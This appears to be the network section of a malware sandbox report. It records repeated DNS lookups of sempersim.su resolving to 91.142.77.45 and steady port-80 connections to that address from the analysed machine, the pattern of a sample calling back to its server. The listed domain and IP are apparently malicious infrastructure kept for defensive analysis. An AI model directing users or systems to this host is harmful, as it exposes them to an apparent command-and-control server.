Nov 3, 2022 12:31:29.283785105 CET	49736	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:29.346216917 CET	80	49736	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:30.738261938 CET	80	49736	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:30.741126060 CET	49736	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:30.741179943 CET	49736	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:30.803993940 CET	80	49736	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:30.980776072 CET	49737	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:31.042650938 CET	80	49737	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:31.042849064 CET	49737	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:31.046497107 CET	49737	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:31.108190060 CET	80	49737	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:31.108310938 CET	49737	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:31.170068979 CET	80	49737	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:32.671320915 CET	80	49737	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:32.671487093 CET	49737	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:32.671545029 CET	49737	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:32.733457088 CET	80	49737	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:32.953636885 CET	49738	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:33.015853882 CET	80	49738	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:33.016099930 CET	49738	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:33.019427061 CET	49738	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:33.329691887 CET	49738	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:33.391851902 CET	80	49738	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:33.642221928 CET	49738	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:33.704520941 CET	80	49738	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:35.287070036 CET	80	49738	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:35.287317038 CET	49738	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:35.287385941 CET	49738	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:35.349495888 CET	80	49738	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:35.541304111 CET	49739	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:35.603343010 CET	80	49739	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:35.603456020 CET	49739	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:35.606376886 CET	49739	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:35.668528080 CET	80	49739	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:35.668613911 CET	49739	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:35.730834961 CET	80	49739	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:37.318947077 CET	80	49739	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:37.319128036 CET	49739	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:37.324352026 CET	49739	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:37.386449099 CET	80	49739	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:37.557636976 CET	49740	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:37.619791985 CET	80	49740	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:37.619992018 CET	49740	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:37.627027035 CET	49740	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:37.939471960 CET	49740	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:38.001672983 CET	80	49740	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:38.251959085 CET	49740	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:38.314244986 CET	80	49740	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:39.620075941 CET	80	49740	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:39.620259047 CET	49740	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:39.620873928 CET	49740	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:39.685184002 CET	80	49740	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:39.881978035 CET	49741	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:39.943818092 CET	80	49741	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:39.944036961 CET	49741	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:39.946872950 CET	49741	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:40.008548021 CET	80	49741	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:40.008711100 CET	49741	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:40.314831972 CET	49741	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:40.376741886 CET	80	49741	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:41.587642908 CET	80	49741	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:41.587827921 CET	49741	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:41.591990948 CET	49741	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:41.653644085 CET	80	49741	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:41.827121019 CET	49742	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:41.889702082 CET	80	49742	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:41.889812946 CET	49742	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:41.893270016 CET	49742	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:41.955686092 CET	80	49742	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:41.955784082 CET	49742	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:42.018265009 CET	80	49742	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:43.475625992 CET	80	49742	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:43.475738049 CET	49742	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:43.475821018 CET	49742	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:43.538353920 CET	80	49742	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:43.715476990 CET	49743	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:43.777441978 CET	80	49743	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:43.778053999 CET	49743	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:43.782644987 CET	49743	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:43.844577074 CET	80	49743	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:43.846440077 CET	49743	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:43.908443928 CET	80	49743	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:45.271881104 CET	80	49743	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:45.272099972 CET	49743	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:45.272125006 CET	49743	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:45.334127903 CET	80	49743	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:45.512383938 CET	49744	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:45.574126005 CET	80	49744	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:45.574229002 CET	49744	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:45.577785969 CET	49744	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:45.639370918 CET	80	49744	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:45.639533043 CET	49744	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:45.701874018 CET	80	49744	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:47.249314070 CET	80	49744	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:47.249638081 CET	49744	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:47.252274036 CET	49744	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:47.313911915 CET	80	49744	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:47.501317024 CET	49745	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:50.503050089 CET	49745	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:50.565231085 CET	80	49745	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:50.565506935 CET	49745	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:50.569101095 CET	49745	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:50.631099939 CET	80	49745	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:50.631377935 CET	49745	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:50.693312883 CET	80	49745	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:52.163666964 CET	80	49745	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:52.164477110 CET	49745	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:52.164544106 CET	49745	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:52.226689100 CET	80	49745	91.142.77.45	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 3, 2022 12:30:06.615612984 CET	49786	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:06.635174990 CET	53	49786	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:11.893251896 CET	58595	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:11.910538912 CET	53	58595	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:13.938466072 CET	56331	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:13.958684921 CET	53	56331	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:15.990658998 CET	50506	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:16.008389950 CET	53	50506	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:17.960731983 CET	49448	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:18.222553015 CET	53	49448	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:20.174104929 CET	59082	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:20.193391085 CET	53	59082	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:22.044584990 CET	59504	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:22.064102888 CET	53	59504	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:25.312644958 CET	65198	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:25.332699060 CET	53	65198	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:27.345777988 CET	62910	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:27.365106106 CET	53	62910	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:30.240421057 CET	63863	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:31.064527988 CET	53	63863	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:32.906943083 CET	63229	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:32.924936056 CET	53	63229	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:34.919732094 CET	62538	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:34.938977957 CET	53	62538	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:36.914690018 CET	54903	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:36.935085058 CET	53	54903	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:41.510499001 CET	51530	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:41.802865028 CET	53	51530	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:45.704906940 CET	56122	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:45.724493027 CET	53	56122	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:47.939956903 CET	52556	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:47.958667994 CET	53	52556	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:50.734925985 CET	61609	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:50.754672050 CET	53	61609	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:53.275834084 CET	52481	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:53.293008089 CET	53	52481	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:54.819243908 CET	53943	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:54.838155985 CET	53	53943	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:57.832797050 CET	56086	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:57.850481033 CET	53	56086	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:59.560048103 CET	56547	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:59.579384089 CET	53	56547	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:01.170101881 CET	59881	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:01.189847946 CET	53	59881	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:03.812359095 CET	58917	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:03.831717968 CET	53	58917	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:05.602891922 CET	50343	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:05.622453928 CET	53	50343	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:07.541344881 CET	62520	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:07.558957100 CET	53	62520	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:09.419343948 CET	55629	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:09.438843966 CET	53	55629	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:11.161881924 CET	52079	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:11.179299116 CET	53	52079	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:22.519120932 CET	56569	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:22.538552046 CET	53	56569	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:25.278309107 CET	61833	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:25.295921087 CET	53	61833	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:27.427875996 CET	65044	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:27.445188999 CET	53	65044	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:29.125849009 CET	60032	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:29.145350933 CET	53	60032	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:30.955920935 CET	49232	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:30.976178885 CET	53	49232	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:32.930668116 CET	56123	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:32.949887991 CET	53	56123	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:35.521024942 CET	59752	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:35.540065050 CET	53	59752	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:37.538077116 CET	52865	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:37.555300951 CET	53	52865	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:39.862227917 CET	57322	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:39.879426956 CET	53	57322	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:41.802947998 CET	62958	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:41.821785927 CET	53	62958	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:43.694916964 CET	64404	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:43.714163065 CET	53	64404	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:45.492507935 CET	62848	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:45.510040045 CET	53	62848	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:47.481296062 CET	55956	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:47.499958038 CET	53	55956	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 3, 2022 12:30:06.615612984 CET	192.168.2.6	8.8.8.8	0x9698	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:11.893251896 CET	192.168.2.6	8.8.8.8	0x836	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:13.938466072 CET	192.168.2.6	8.8.8.8	0x6c7f	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:15.990658998 CET	192.168.2.6	8.8.8.8	0x898b	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:17.960731983 CET	192.168.2.6	8.8.8.8	0xfd9	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:20.174104929 CET	192.168.2.6	8.8.8.8	0xb2c5	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:22.044584990 CET	192.168.2.6	8.8.8.8	0x3df	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:25.312644958 CET	192.168.2.6	8.8.8.8	0x1b5b	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:27.345777988 CET	192.168.2.6	8.8.8.8	0x744c	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:30.240421057 CET	192.168.2.6	8.8.8.8	0x679b	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:32.906943083 CET	192.168.2.6	8.8.8.8	0x93fc	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:34.919732094 CET	192.168.2.6	8.8.8.8	0xf5b2	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:36.914690018 CET	192.168.2.6	8.8.8.8	0x4e0b	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:41.510499001 CET	192.168.2.6	8.8.8.8	0x72f	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:45.704906940 CET	192.168.2.6	8.8.8.8	0x2cbb	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:47.939956903 CET	192.168.2.6	8.8.8.8	0x5480	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:50.734925985 CET	192.168.2.6	8.8.8.8	0xeac7	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:53.275834084 CET	192.168.2.6	8.8.8.8	0xa703	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:54.819243908 CET	192.168.2.6	8.8.8.8	0xb2a0	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:57.832797050 CET	192.168.2.6	8.8.8.8	0x101a	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:59.560048103 CET	192.168.2.6	8.8.8.8	0x26c2	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:01.170101881 CET	192.168.2.6	8.8.8.8	0x2de9	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:03.812359095 CET	192.168.2.6	8.8.8.8	0x997d	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:05.602891922 CET	192.168.2.6	8.8.8.8	0xdc66	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:07.541344881 CET	192.168.2.6	8.8.8.8	0x2825	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:09.419343948 CET	192.168.2.6	8.8.8.8	0xa44c	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:11.161881924 CET	192.168.2.6	8.8.8.8	0xbf26	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:22.519120932 CET	192.168.2.6	8.8.8.8	0x8b48	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:25.278309107 CET	192.168.2.6	8.8.8.8	0x6a31	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:27.427875996 CET	192.168.2.6	8.8.8.8	0x81d8	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:29.125849009 CET	192.168.2.6	8.8.8.8	0x5fd	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:30.955920935 CET	192.168.2.6	8.8.8.8	0x984b	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:32.930668116 CET	192.168.2.6	8.8.8.8	0x5c96	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:35.521024942 CET	192.168.2.6	8.8.8.8	0x9f71	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:37.538077116 CET	192.168.2.6	8.8.8.8	0x396f	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:39.862227917 CET	192.168.2.6	8.8.8.8	0xc65	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:41.802947998 CET	192.168.2.6	8.8.8.8	0xe860	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:43.694916964 CET	192.168.2.6	8.8.8.8	0x4f0d	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:45.492507935 CET	192.168.2.6	8.8.8.8	0x845a	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:47.481296062 CET	192.168.2.6	8.8.8.8	0xe70	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 3, 2022 12:30:06.635174990 CET	8.8.8.8	192.168.2.6	0x9698	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:11.910538912 CET	8.8.8.8	192.168.2.6	0x836	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:13.958684921 CET	8.8.8.8	192.168.2.6	0x6c7f	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:16.008389950 CET	8.8.8.8	192.168.2.6	0x898b	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:18.222553015 CET	8.8.8.8	192.168.2.6	0xfd9	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:20.193391085 CET	8.8.8.8	192.168.2.6	0xb2c5	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:22.064102888 CET	8.8.8.8	192.168.2.6	0x3df	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:25.332699060 CET	8.8.8.8	192.168.2.6	0x1b5b	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:27.365106106 CET	8.8.8.8	192.168.2.6	0x744c	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:31.064527988 CET	8.8.8.8	192.168.2.6	0x679b	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:32.924936056 CET	8.8.8.8	192.168.2.6	0x93fc	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:34.938977957 CET	8.8.8.8	192.168.2.6	0xf5b2	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:36.935085058 CET	8.8.8.8	192.168.2.6	0x4e0b	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:41.802865028 CET	8.8.8.8	192.168.2.6	0x72f	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:45.724493027 CET	8.8.8.8	192.168.2.6	0x2cbb	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:47.958667994 CET	8.8.8.8	192.168.2.6	0x5480	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:50.754672050 CET	8.8.8.8	192.168.2.6	0xeac7	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:53.293008089 CET	8.8.8.8	192.168.2.6	0xa703	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:54.838155985 CET	8.8.8.8	192.168.2.6	0xb2a0	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:57.850481033 CET	8.8.8.8	192.168.2.6	0x101a	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:59.579384089 CET	8.8.8.8	192.168.2.6	0x26c2	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:01.189847946 CET	8.8.8.8	192.168.2.6	0x2de9	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:03.831717968 CET	8.8.8.8	192.168.2.6	0x997d	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:05.622453928 CET	8.8.8.8	192.168.2.6	0xdc66	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:07.558957100 CET	8.8.8.8	192.168.2.6	0x2825	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:09.438843966 CET	8.8.8.8	192.168.2.6	0xa44c	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:11.179299116 CET	8.8.8.8	192.168.2.6	0xbf26	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:22.538552046 CET	8.8.8.8	192.168.2.6	0x8b48	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:25.295921087 CET	8.8.8.8	192.168.2.6	0x6a31	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:27.445188999 CET	8.8.8.8	192.168.2.6	0x81d8	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:29.145350933 CET	8.8.8.8	192.168.2.6	0x5fd	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:30.976178885 CET	8.8.8.8	192.168.2.6	0x984b	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:32.949887991 CET	8.8.8.8	192.168.2.6	0x5c96	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:35.540065050 CET	8.8.8.8	192.168.2.6	0x9f71	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:37.555300951 CET	8.8.8.8	192.168.2.6	0x396f	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:39.879426956 CET	8.8.8.8	192.168.2.6	0xc65	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:41.821785927 CET	8.8.8.8	192.168.2.6	0xe860	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:43.714163065 CET	8.8.8.8	192.168.2.6	0x4f0d	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:45.510040045 CET	8.8.8.8	192.168.2.6	0x845a	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:47.499958038 CET	8.8.8.8	192.168.2.6	0xe70	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

sempersim.su

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
